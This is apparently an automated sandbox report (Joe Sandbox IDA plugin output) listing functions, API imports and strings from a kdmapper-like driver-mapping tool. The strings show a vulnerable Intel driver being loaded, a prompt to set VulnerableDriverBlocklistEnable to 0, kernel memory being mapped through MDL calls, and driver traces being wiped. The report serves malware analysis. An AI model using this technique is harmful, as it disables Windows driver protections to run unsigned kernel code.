Part of subcall function 00007FF7738ED270: memmove.VCRUNTIME140 ref: 00007FF7738ED373
Part of subcall function 00007FF7738ED270: memmove.VCRUNTIME140 ref: 00007FF7738ED383

RegCreateKeyW.ADVAPI32 ref: 00007FF7738F29E3
RegSetKeyValueW.ADVAPI32 ref: 00007FF7738F2A25
RegCloseKey.ADVAPI32 ref: 00007FF7738F2A33
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2A56
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2AA1
RegSetKeyValueW.ADVAPI32 ref: 00007FF7738F2ACB
RegCloseKey.ADVAPI32 ref: 00007FF7738F2AD9
RegCloseKey.ADVAPI32 ref: 00007FF7738F2AEB
GetModuleHandleA.KERNEL32 ref: 00007FF7738F2AF8
GetProcAddress.KERNEL32 ref: 00007FF7738F2B14
GetProcAddress.KERNEL32 ref: 00007FF7738F2B27
RtlInitUnicodeString.NTDLL ref: 00007FF7738F2BA4
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738F2BCF
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z.MSVCP140 ref: 00007FF7738F2BDA
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2BEA
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2C19
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2C3C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2C5F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2CA2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2D1F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2D74

Strings

ntdll.dll, xrefs: 00007FF7738F2AF1
RtlAdjustPrivilege, xrefs: 00007FF7738F2B0A
SYSTEM\CurrentControlSet\Services\, xrefs: 00007FF7738F2977
[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0, xrefs: 00007FF7738F2C42
Type, xrefs: 00007FF7738F2AC2
[+] NtLoadDriver Status 0x, xrefs: 00007FF7738F2BB2
Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator., xrefs: 00007FF7738F2B43
[-] Can't create 'ImagePath' registry value, xrefs: 00007FF7738F2A39
[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config, xrefs: 00007FF7738F2C1F
\Registry\Machine\System\CurrentControlSet\Services\, xrefs: 00007FF7738F2B81
[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver, xrefs: 00007FF7738F2BFC
\??\, xrefs: 00007FF7738F29B9
4, xrefs: 00007FF7738F2B78
[-] Can't create 'Type' registry value, xrefs: 00007FF7738F2ADF
ImagePath, xrefs: 00007FF7738F2A18
[-] Can't create service key, xrefs: 00007FF7738F29ED
NtLoadDriver, xrefs: 00007FF7738F2B1D

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@_invalid_parameter_noinfo_noreturn$Close$??6?$basic_ostream@_AddressProcU?$char_traits@_ValueW@std@@@std@@memmove$CreateHandleInitModuleStringUnicodeV21@@Vios_base@1@
String ID: 4$Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator.$ImagePath$NtLoadDriver$RtlAdjustPrivilege$SYSTEM\CurrentControlSet\Services\$Type$[+] NtLoadDriver Status 0x$[-] Can't create 'ImagePath' registry value$[-] Can't create 'Type' registry value$[-] Can't create service key$[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config$[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0$[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver$\??\$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
API String ID: 2246562810-3754729842
Opcode ID: bad4f9c7ded0c0f6d20b53bc3d8834b7fe06785ed49c321b1fa59c292b833d7c
Instruction ID: 13068454ab7ce7cb183342424eeaad69fd0ebd9f3b53f1fd0b7b6dd4ade9761d
Opcode Fuzzy Hash: bad4f9c7ded0c0f6d20b53bc3d8834b7fe06785ed49c321b1fa59c292b833d7c
Instruction Fuzzy Hash: 6DD17163F38A0795EB90EB64E4442BCE361AB94794F800231DA5D67698DF3EE169C370

Function 00007FF7738ED8F0 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 289COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED9D3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDA13
DeviceIoControl.KERNEL32 ref: 00007FF7738EDB2A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDB6D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDC60
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EDC20

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDA36

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EDD27
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDD67
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDD8A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDDD3

Strings

MmProtectMdlSystemAddress, xrefs: 00007FF7738EDCCD
[-] Couldn't allocate enough memory, cleaning up, xrefs: 00007FF7738EDB50
[-] Can't change protection for mdl pages, cleaning up, xrefs: 00007FF7738EDD6D
MmAllocatePagesForMdl, xrefs: 00007FF7738ED979
[!] Failed to find MmMapLockedPagesSpecifyCache, xrefs: 00007FF7738EDC43
0, xrefs: 00007FF7738EDB03
MmMapLockedPagesSpecifyCache, xrefs: 00007FF7738EDBC6
[-] Can't allocate pages for mdl, xrefs: 00007FF7738EDA19
[!] Failed to find MmAlocatePagesForMdl, xrefs: 00007FF7738ED9F6
[+] Allocated pages for mdl, xrefs: 00007FF7738EDDB6
[!] Failed to find MmProtectMdlSystemAddress, xrefs: 00007FF7738EDD4A
[-] Can't read the _MDL : byteCount, xrefs: 00007FF7738EDDED
[-] Can't set mdl pages cache, cleaning up., xrefs: 00007FF7738EDC66

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevice_invalid_parameter_noinfo_noreturn$AcquireExclusiveLockmemmovememset
String ID: 0$MmAllocatePagesForMdl$MmMapLockedPagesSpecifyCache$MmProtectMdlSystemAddress$[!] Failed to find MmAlocatePagesForMdl$[!] Failed to find MmMapLockedPagesSpecifyCache$[!] Failed to find MmProtectMdlSystemAddress$[+] Allocated pages for mdl$[-] Can't allocate pages for mdl$[-] Can't change protection for mdl pages, cleaning up$[-] Can't read the _MDL : byteCount$[-] Can't set mdl pages cache, cleaning up.$[-] Couldn't allocate enough memory, cleaning up
API String ID: 2001844386-3948469999
Opcode ID: f276b7c405476224f99460dd4f2724caf038036cd5c9b10b06ba8ab5ae69e923
Instruction ID: 56dd7638a5bc923e62dec198f1b59a0635a8e37bbe5e52160615d5e7a9bda2ce
Opcode Fuzzy Hash: f276b7c405476224f99460dd4f2724caf038036cd5c9b10b06ba8ab5ae69e923
Instruction Fuzzy Hash: BBE16023F78B4395EA80FB64D8802B8E361AB54798FC45332D95C66695DF3EE568C330

Function 00007FF7738E5A80 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5AD0
CloseHandle.KERNEL32 ref: 00007FF7738E5AE3

Part of subcall function 00007FF7738E45E0: memset.VCRUNTIME140 ref: 00007FF7738E4325
Part of subcall function 00007FF7738E45E0: GetTempPathW.KERNEL32 ref: 00007FF7738E4333
Part of subcall function 00007FF7738E45E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4453

CloseHandle.KERNEL32 ref: 00007FF7738E5AF6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E5B56
memset.VCRUNTIME140 ref: 00007FF7738E5B85

Part of subcall function 00007FF7738E89C0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E89F3
Part of subcall function 00007FF7738E89C0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E8A12
Part of subcall function 00007FF7738E89C0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E8A44
Part of subcall function 00007FF7738E89C0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E8A5F
Part of subcall function 00007FF7738E89C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E8AA9

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5BCA

Part of subcall function 00007FF7738E9EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F50
Part of subcall function 00007FF7738E9EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F72

rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5BD0
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5BD9
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5C26
?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF7738E5C64
??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738E5C74
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5CA2
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E5CCF
_wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7738E5CEE

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D71
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D7C
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D86
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E5DC6

Strings

[<] Unloading vulnerable driver, xrefs: 00007FF7738E5AB3
[+] Vul driver data destroyed before unlink, xrefs: 00007FF7738E5C8C
[!] Failed to open file for writing, xrefs: 00007FF7738E5BAD
[!] Error dumping shit inside the disk, xrefs: 00007FF7738E5C83

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@?setstate@?$basic_ios@U?$char_traits@_V01@@W@std@@@std@@_invalid_parameter_noinfo_noreturnrand$?good@ios_base@std@@CloseHandleInit@?$basic_streambuf@V12@memset$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_Osfx@?$basic_ostream@_PathTempV?$basic_streambuf@_wremovefclose
String ID: [!] Error dumping shit inside the disk$[!] Failed to open file for writing$[+] Vul driver data destroyed before unlink$[<] Unloading vulnerable driver
API String ID: 853663293-655004714
Opcode ID: 96eae8768ba8d36aecfb9f1dfd7fd46c807c9eb899f352e668a9978eb4071c0a
Instruction ID: 2c583873e766ff4de925c906018113f5eeb378d019804286431883fafc2eb359
Opcode Fuzzy Hash: 96eae8768ba8d36aecfb9f1dfd7fd46c807c9eb899f352e668a9978eb4071c0a
Instruction Fuzzy Hash: 2EA19063B38A4381EB80EB64E454278E361EB94BA4F804332DA5D676A8DF3ED555C730

Function 00007FF7738F2DC0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 177registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738F2DF5
RtlInitUnicodeString.NTDLL ref: 00007FF7738F2E68
RegOpenKeyW.ADVAPI32 ref: 00007FF7738F2EC6
RegCloseKey.ADVAPI32 ref: 00007FF7738F2EDF
GetProcAddress.KERNEL32 ref: 00007FF7738F2EEF

Part of subcall function 00007FF7738EA7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA839
Part of subcall function 00007FF7738EA7C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA859
Part of subcall function 00007FF7738EA7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA869
Part of subcall function 00007FF7738EA7C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA9E6
Part of subcall function 00007FF7738EA7C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA9ED
Part of subcall function 00007FF7738EA7C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA9FA

??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738F2F1A
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z.MSVCP140 ref: 00007FF7738F2F25
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2F35
RegDeleteTreeW.ADVAPI32 ref: 00007FF7738F2F96

Part of subcall function 00007FF7738EA7C0: ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA894
Part of subcall function 00007FF7738EA7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA906
Part of subcall function 00007FF7738EA7C0: ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA94E
Part of subcall function 00007FF7738EA7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA95C

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2F5C
RegDeleteTreeW.ADVAPI32 ref: 00007FF7738F2F77
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2FDD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F3032

Strings

[+] NtUnloadDriver Status 0x, xrefs: 00007FF7738F2EFD
ntdll.dll, xrefs: 00007FF7738F2DEE
SYSTEM\CurrentControlSet\Services\, xrefs: 00007FF7738F2E9C
NtUnloadDriver, xrefs: 00007FF7738F2EE5
\Registry\Machine\System\CurrentControlSet\Services\, xrefs: 00007FF7738F2E45
", xrefs: 00007FF7738F2E93
[-] Driver Unload Failed!!, xrefs: 00007FF7738F2F3F

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_V01@W@std@@@std@@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@??6?$basic_ostream@_?good@ios_base@std@@?sputc@?$basic_streambuf@_DeleteTreeV01@@_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_AddressCloseHandleInitModuleOpenOsfx@?$basic_ostream@_ProcStringUnicodeV12@V21@@Vios_base@1@Vlocale@2@W@std@@
String ID: "$NtUnloadDriver$SYSTEM\CurrentControlSet\Services\$[+] NtUnloadDriver Status 0x$[-] Driver Unload Failed!!$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
API String ID: 2676758807-3977549460
Opcode ID: a1bdb43c1ecff9b8d6c2fad003287c69e56737ca586bee21a79b0004c94f36db
Instruction ID: 83f438eb9a98386fdf701e2ba2461ade3042937436d2f0c4c945183b8aa31c3d
Opcode Fuzzy Hash: a1bdb43c1ecff9b8d6c2fad003287c69e56737ca586bee21a79b0004c94f36db
Instruction Fuzzy Hash: 3A71B163B38A0395EF50AF65D4542BCE360FB94B98F800631DA5D66698DF3ED159C330

Function 00007FF7738E6FC0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 188COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7080
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E70C0
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EC196
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EC1BE

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EC1EE
0, xrefs: 00007FF7738EC2F4
[!] Failed to find ExReleaseResourceLite, xrefs: 00007FF7738E70A3
ExReleaseResourceLite, xrefs: 00007FF7738E7022
[-] Failed to load win32u.dll, xrefs: 00007FF7738EC1A1
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EC206
win32u.dll, xrefs: 00007FF7738EC18F

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@ControlD@std@@@std@@DeviceU?$char_traits@V01@@$AcquireExclusiveHandleLockModule_invalid_parameter_noinfo_noreturnmemmovememset
String ID: 0$ExReleaseResourceLite$NtUserSetGestureConfig$[!] Failed to find ExReleaseResourceLite$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 3251399726-2657333773
Opcode ID: c0331179f477c252aaa19f7e8929f9201ef5c3b9b72d89fc378fedd66c78330d
Instruction ID: 23616392945ab67d8dd919a3f3166d79f4e85857b811806d1b10932480d74d52
Opcode Fuzzy Hash: c0331179f477c252aaa19f7e8929f9201ef5c3b9b72d89fc378fedd66c78330d
Instruction Fuzzy Hash: 23916D73A38B4395EB80EB21E8506A9E3A0FB98788F804235ED5D67754DF3ED165C720

Function 00007FF7738EDE00 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 112COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDE91

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDEB4
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDF77
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDF9A

Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

Strings

[!] Failed to find MmSetPageProtection, xrefs: 00007FF7738EDF61
PAGE, xrefs: 00007FF7738EDF1A
PAGELK, xrefs: 00007FF7738EDE34
[-] Failed to change page protections, xrefs: 00007FF7738EDF84
[-] Error allocating independent pages, xrefs: 00007FF7738EDE9E
[!] Failed to find MmAllocateIndependentPagesEx, xrefs: 00007FF7738EDE7B
xx????x???x?x????xxxxxxx????x, xrefs: 00007FF7738EDF33
x????xxxxxxxx????xxxxxxxxx????xxxxxxxx, xrefs: 00007FF7738EDE4D

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
